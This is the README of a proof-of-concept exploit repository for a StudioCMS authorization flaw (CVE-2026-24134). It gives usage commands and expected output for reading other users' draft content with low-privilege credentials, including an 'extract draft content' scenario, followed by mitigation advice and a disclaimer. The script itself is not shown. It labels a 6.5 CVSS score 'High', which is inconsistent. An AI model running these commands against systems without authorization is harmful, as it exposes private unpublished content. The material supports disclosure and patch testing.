# CVE-2026-24134-PoC

## Overview

This repository contains the Proof of Concept (PoC) for **CVE-2026-24134**, a Broken Object Level Authorization (BOLA) vulnerability in StudioCMS.

## Contents

- `cve_2026_24134_poc.py` - Python exploitation script

## Prerequisites
- StudioCMS<=0.1.1
```bash
pip install requests colorama
```

## Quick Start

### Manual Exploitation

```bash
# Basic usage
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

# Save output to file
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148 \
  --save
```

### Automated Testing

```bash
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --auto-test \
  --visitor-user visitor01 \
  --visitor-pass visitorpass \
  --editor-user editor01 \
  --editor-pass editorpass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148
```

## Arguments

### Required
- `-u, --url` - Target StudioCMS base URL
- `--uuid` - Target draft content UUID

### Manual Mode
- `--username` - Username for authentication
- `--password` - Password for authentication

### Automated Test Mode
- `--auto-test` - Enable automated testing
- `--visitor-user` - Visitor account username
- `--visitor-pass` - Visitor account password
- `--editor-user` - Editor account username
- `--editor-pass` - Editor account password

### Optional
- `--save` - Save response content to file
- `--no-ssl-verify` - Disable SSL certificate verification

## Example Scenarios

### Scenario 1: Test if system is vulnerable

```bash
python3 cve_2026_24134_poc.py \
  --url http://target.com \
  --auto-test \
  --visitor-user test_visitor \
  --visitor-pass SecurePass123! \
  --editor-user test_editor \
  --editor-pass SecurePass456! \
  --uuid 12345678-1234-1234-1234-123456789abc
```

**Expected output if vulnerable:**
```
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[+] Successfully accessed draft content!
[!] VULNERABILITY CONFIRMED!
```

**Expected output if patched:**
```
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[*] Access denied (403 Forbidden)
[+] VULNERABILITY NOT PRESENT
```

### Scenario 2: Extract draft content

```bash
python3 cve_2026_24134_poc.py \
  --url http://localhost:4321 \
  --username attacker \
  --password pass123 \
  --uuid target-uuid-here \
  --save
```

This will save the full draft content to `draft_{uuid}.html`.

## Understanding the Output

### Success Indicators
- `[+]` - Successful operation (green)
- `[*]` - Informational message (blue)
- `[!]` - Warning (yellow)
- `[-]` - Error (red)

### HTTP Status Codes
- **200 OK** - Vulnerable! Draft content accessed
- **403 Forbidden** - Patched! Proper authorization in place
- **404 Not Found** - UUID invalid or secure implementation (returns 404 instead of revealing existence)
- **401 Unauthorized** - Authentication failed

## Mitigation

If you're running a vulnerable version of StudioCMS, update immediately to the patched version.

### For Developers

**The Real Problem:** Authorization checks were performed client-side (JavaScript), not server-side.

According to the development team:
> "Currently the rank level check to redirect is being done in client JS, which was supposed to be replaced shortly there after."

**The Fix:** Move authorization from client to server.

**Key Principle:** Never trust the client. Client-side security = UX enhancement. Server-side security = actual protection.

## Legal Disclaimer

**IMPORTANT:** This tool is provided for educational and authorized security testing purposes only.

- Only use against systems you own or have explicit written permission to test
- Unauthorized access to computer systems is illegal in most jurisdictions
- The author assumes no liability for misuse of this tool
- Always follow responsible disclosure practices

## References

- **CVE:** CVE-2026-24134
- **CVSS:** 6.5 High
- **CWE:** CWE-639
- **OWASP:** API1:2023 - Broken Object Level Authorization

## Contact

For questions about this PoC or vulnerability:
- **Author:** Filipe Gaudard

## License

This PoC is released for educational purposes. Use responsibly and ethically.
